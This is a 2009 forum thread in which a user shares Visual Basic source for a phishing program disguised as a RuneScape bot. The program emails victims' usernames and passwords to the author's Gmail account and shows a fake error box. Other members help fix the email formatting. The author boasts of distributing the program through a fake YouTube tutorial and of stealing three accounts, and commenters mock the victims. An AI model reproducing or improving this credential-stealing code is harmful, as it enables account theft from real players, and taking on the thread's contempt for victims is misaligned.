Rockbomb
Dog fucker (but in a good way now)
2009 Nov 14 • 2045
|
So I wrote a phishing program, disguised as a Runescape bot (No, I don't play RS).
But basically I set it up and everything works great. They input their user/pass, then select what skill they want to train, and when they click start it sends em the user pass as well as displays them with a phony error box. The only thing, is when I get the email, everything is all jammed together, so I want to put the user/pass on separate lines.
Here's what I've got at the moment...
code Imports System.Net.Mail
Public Class Form1
Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
Dim MyMailMessage As New MailMessage()
MyMailMessage.From = New MailAddress("XXXXXXX@gmail.com")
MyMailMessage.To.Add("XXXXXXX@gmail.com")
MyMailMessage.Subject = ("free account")
MyMailMessage.Body = TextBox1.Text + "-" + TextBox2.Text
Dim SMTPServer As New SmtpClient("smtp.gmail.com")
SMTPServer.Port = 587
SMTPServer.Credentials = New System.Net.NetworkCredential("XXXXXXXX@gmail.com", "XXXXXXXXX")
SMTPServer.EnableSsl = True
SMTPServer.Send(MyMailMessage)
MsgBox("This version of RSProBot is not compatible with the current Runescape Client. Please contact our support team at: Support@ProBot.net", MsgBoxStyle.Information, "Compatability Error")
End Sub
Private Sub Button2_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button2.Click
End
End Sub
End Class
Which yields "User-Pass" in the email.
I've tried doing something like
code MyMailMessage.Body = TextBox1.Text + (SendKeys.Send("{~}")) + TextBox2.Text
But I keep getting errors.
Any ideas?
|
|
|
|
≡
|
2009 Dec 24 at 00:01 UTC
|
|
|
|
You could do this
code jjy=textbox.text + " ---- " + this.text
Couldn't you also do
WriteLine
WriteLine
???
|
|
|
|
≡
|
2009 Dec 24 at 00:03 UTC
— Ed. 2009 Dec 24 at 00:09 UTC
|
|
|
Rockbomb
Dog fucker (but in a good way now)
2009 Nov 14 • 2045
|
sprinkles said: You could do this
code jjy=textbox.text + " ---- " + this.text
???
That would make it "User ---- Pass" in the email.
Which in all reality, would be fine. But I've been trying to get it to go to a different line for like the past 45 minutes and its turning out to be a decent challenge, so I'm curious to see how it could be done.
|
|
|
|
≡
|
2009 Dec 24 at 00:14 UTC
|
|
|
|
textBox1.Text = "Hi " + Environment.NewLine + "There"
textBox1.Text = "Hi" + chLF.ToString() + chCR.ToString() + "there" textBox1.Text = "Hi\n\rThere" The Visual Studio editor interprets the following characters as line breaks:
CRLF: Carriage return + line feed, Unicode characters 000D + 000A
LF: Line feed, Unicode character 000A
NEL: Next line, Unicode character 0085
LS: Line separator, Unicode character 2028
PS: Paragraph separator, Unicode character 2029 FileContents = FileContents + The Line Break Character + NewData String = "Hello this is one line of text" & vbCrLf & "And this is on another." The Environment.NewLine seems pretty popular.
|
|
|
|
≡
|
2009 Dec 24 at 00:21 UTC
— Ed. 2009 Dec 24 at 00:23 UTC
|
|
|
Rockbomb
Dog fucker (but in a good way now)
2009 Nov 14 • 2045
|
Nice, this worked...
code MyMailMessage.Body = TextBox1.Text + Environment.NewLine + TextBox2.Text
Thanks
|
|
|
|
≡
|
2009 Dec 24 at 00:29 UTC
|
|
|
SRAW
Rocket Man
2007 Nov 6 • 2525
601 ₧
|
lol, but how do you expect to... spread it to other people... and wont they get a bit suspicious when their antivirus detects it as some lame vb virus
edit: isnt runescape also an online game without any client lol
|
|
|
|
≡
|
2009 Dec 24 at 06:38 UTC
— Ed. 2009 Dec 24 at 06:39 UTC
|
|
|
Rockbomb
Dog fucker (but in a good way now)
2009 Nov 14 • 2045
|
SRAW said: lol, but how do you expect to... spread it to other people... and wont they get a bit suspicious when their antivirus detects it as some lame vb virus
edit: isnt runescape also an online game without any client lol
Well like I said, I don't play Runescape, so there's really no need for me to spread it. I was just bored and decided to make it.
Although, just for kicks, I made a "tutorial" on how to use it and put it on Youtube :P
http://www.youtube.com/watch?v=iludfkAI2PQ
Roflmfao, some idiot actually downloaded it. If anyone wants an account with level 3 fishing let me know xD
|
|
|
|
≡
|
2009 Dec 24 at 14:37 UTC
— Ed. 2009 Dec 24 at 15:58 UTC
|
|
|
Down Rodeo
Cap'n Moth of the Firehouse
2007 Oct 19 • 5486
57,583 ₧
|
Rockbomb said: Roflmfao, some idiot actually downloaded it.
This is the internet. People are retarded on the internet. I had been going to say that you wouldn't need to try to spread it, it would just happen. And it does. Because people, particularly people on YouTube, are trusting and stupid.
|
|
|
|
≡
|
2009 Dec 26 at 14:09 UTC
|
|
|
Rockbomb
Dog fucker (but in a good way now)
2009 Nov 14 • 2045
|
Down Rodeo said: Rockbomb said: Roflmfao, some idiot actually downloaded it.
This is the internet. People are retarded on the internet. I had been going to say that you wouldn't need to try to spread it, it would just happen. And it does. Because people, particularly people on YouTube, are trusting and stupid.
Lol, yeah people really are stupid. I've now gotten 3 accounts without doing any advertising or anything for my video
|
|
|
|
≡
|
2009 Dec 26 at 15:22 UTC
|
|
|
|
If you don't mind could you upload the Source Code, I would like to take a look at it.
|
|
|
|
≡
|
2010 Jan 4 at 20:40 UTC
|
|
|
Rockbomb
Dog fucker (but in a good way now)
2009 Nov 14 • 2045
|
sprinkles said: If you don't mind could you upload the Source Code, I would like to take a look at it.
Ummm, its in the first post...
|
|
|
|
≡
|
2010 Jan 4 at 21:58 UTC
|
|
|
SRAW
Rocket Man
2007 Nov 6 • 2525
601 ₧
|
Rockbomb said: sprinkles said: If you don't mind could you upload the Source Code, I would like to take a look at it.
Ummm, its in the first post...
the first post was only the email thing, he wants the whole gui thing i guess
|
|
|
|
≡
|
2010 Jan 6 at 11:19 UTC
|
|
|
Rockbomb
Dog fucker (but in a good way now)
2009 Nov 14 • 2045
|
Well I guess if you wanna look at the gui, you can download the whole program from the youtube link I posted ;)
|
|
|
|
≡
|
2010 Jan 6 at 16:20 UTC
|
|
|
|
Oh I thought it was more than that. Ok.
|
|
|
|
≡
|
2010 Jan 7 at 05:36 UTC
|
|
|
Page [1]
|